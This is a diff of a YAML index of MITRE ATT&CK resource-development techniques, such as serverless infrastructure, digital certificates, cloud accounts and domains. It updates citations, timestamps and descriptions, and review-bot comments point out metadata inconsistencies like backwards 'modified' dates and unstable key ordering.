- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -52239,15 +52918,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
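Review bot: the new `GWS Apps Script Abuse 2021` reference URL ends in `#google_vignette`, which is an ad-interstitial fragment the site appends, not part of the article address. Drop the fragment so the stored URL is `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`, matching how the adjacent BlackWater reference URL is stored.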
@@ -52279,17 +52961,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52342,11 +53023,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52382,7 +53062,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -52431,43 +53111,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
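Review bot: the 31 removed lines in this hunk (`x_mitre_platforms` through the four `external_references` entries and `id: attack-pattern--19401639-...`) are not deleted from T1588.004; they reappear in a different key order in the next hunk. That is generator output with an unstable key order, and it buries the one real change to this object in this hunk (the `modified` stamp). Emit keys in a fixed order, or sort them, so a metadata refresh produces a minimal diff.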
@@ -52480,18 +53129,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
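Review bot: the substantive changes to T1588.004 in this hunk are easy to miss among the re-ordered keys: the `Recorded Future Beacon Certificates` URL moves from `https://www.recordedfuture.com/cobalt-strike-servers/` to `https://www.recordedfuture.com/research/cobalt-strike-servers` with its retrieved date updated to September 16, 2024, `revoked: false` and `x_mitre_deprecated: false` are added, and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0. `x_mitre_version` stays at 1.2, which is right for a citation-only edit. The `external_references` list also changes order (DigiNotar, Recorded Future, Splunk, Let's Encrypt; previously DigiNotar, Let's Encrypt, Splunk, Recorded Future) with no ordering rule visible; pick one and keep it stable.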
@@ -52513,7 +53193,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
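Review bot: `modified` for T1583.002 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-04-15T02:49:49.702Z`, while `x_mitre_version` stays at 1.0 and nothing else in the object changes. The same regression appears below for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003 and T1588.001, all from the same `2022-04-25T14:00:00.188Z` (or, for T1587.001, `2022-05-11T14:00:00.188Z`) stamp. That looks like the previous index was built from a bundle whose timestamps had been bulk-touched; confirm which source is canonical, because any consumer that compares `modified` to decide whether an object is newer will treat this as a downgrade.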
@@ -52529,8 +53209,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
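Review bot: this hunk drops `x_mitre_attack_spec_version: 2.1.0` from T1583.002 outright, whereas T1588.004 and T1586.003 in the same patch are rewritten to `x_mitre_attack_spec_version: 3.2.0`, and T1608.004 (3.1.0) and T1608.002 (2.1.0) keep their old values untouched. After the patch the field is present with three different values on some objects and absent on others (the same removal recurs for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003 and T1588.001). Removing STIX `spec_version: '2.1'` everywhere is consistent; do the same for the ATT&CK spec version, either stamping every object with the bundle's version or dropping it uniformly.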
@@ -52552,7 +53230,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52572,8 +53250,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -52612,7 +53288,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52633,8 +53309,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -52664,7 +53338,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -52701,8 +53375,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -52724,7 +53396,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52746,8 +53418,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -52784,7 +53454,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -52806,8 +53476,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -52869,7 +53537,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52891,7 +53558,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52909,8 +53576,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52945,7 +53610,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52964,33 +53629,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
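Review bot: the rewritten description for T1586.003 adds a spam/phishing use case (Twilio, SendGrid, AWS End User Messaging, SNS, SES) with two new citation keys, `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`; both are resolved by `external_references` entries in the next hunk, and `x_mitre_version` is bumped from 1.0 to 1.1, so the object is internally consistent. Note, however, that `x_mitre_detection` still only points at exfiltration (`Transfer Data to Cloud Account`, T1537) and not at `Phishing` (T1566) as the new text does; if this index mirrors upstream verbatim that is an upstream nit, not something to patch here. The `x_mitre_contributors` and `x_mitre_deprecated` lines are moved, not changed.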
@@ -53000,10 +53663,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -53011,9 +53683,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -53064,11 +53735,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -53081,7 +53751,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -53116,22 +53786,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
